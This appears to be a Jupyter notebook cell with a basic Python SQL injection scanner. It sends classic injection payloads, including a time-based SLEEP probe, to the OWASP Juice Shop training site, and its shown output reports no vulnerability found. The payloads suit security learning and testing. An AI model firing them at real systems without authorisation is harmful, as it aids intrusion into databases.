In [8]:
# For making HTTP requests
import requests
# For measuring response time
import time


def check_vulnerabilities(url):
    """
    Function to check for SQL Injection vulnerabilities.
    It sends different SQL payloads to the target URL and analyzes the response.
    """
    sql_payloads = [
         # Basic SQL Injection
        "' OR '1'='1",
         # SQL Injection with comment
        "' OR '1'='1' --",
       # SQL Injection with hash comment
        "' OR '1'='1' #",
        # SQL Injection with multi-line comment
        "' OR '1'='1' /*",
        # Time-based SQL Injection
        "' OR SLEEP(5) --"

    ]
    # Simulating a real browser request
    headers = {"User-Agent": "Mozilla/5.0"}

    for payload in sql_payloads:
        try:
          # Start timer to measure response time
            start_time = time.time()
            response = requests.get(f"{url}?q={payload}", headers=headers, timeout=10)
            # Calculate response time
            response_time = time.time() - start_time

            if response.status_code == 403:
                print("2. Possible Web Application Firewall (WAF) detected!")
                return  # Stop further testing if WAF is detected

            if response_time > 4:
                print(f"3. Possible Time-based SQL Injection detected with payload: {payload}")
                return  # Detected significant delay indicating time-based SQLi

            if "syntax error" in response.text.lower() or "sql" in response.text.lower():
                print(f"4. SQL Injection detected with payload: {payload}")
                return  # SQL error in response suggests SQL Injection vulnerability

        except requests.exceptions.RequestException:
            print("1. Connection error or request blocked for payload")
            return  # Handle request failures due to blocking or network issues
    # If no payload succeeds/ print output
    print("5. No SQL Injection vulnerability detected")

if __name__ == "__main__":
  # Target website to scan
    target_url = "https://juice-shop.herokuapp.com/#/"
    check_vulnerabilities(target_url)



5. No SQL Injection vulnerability detected
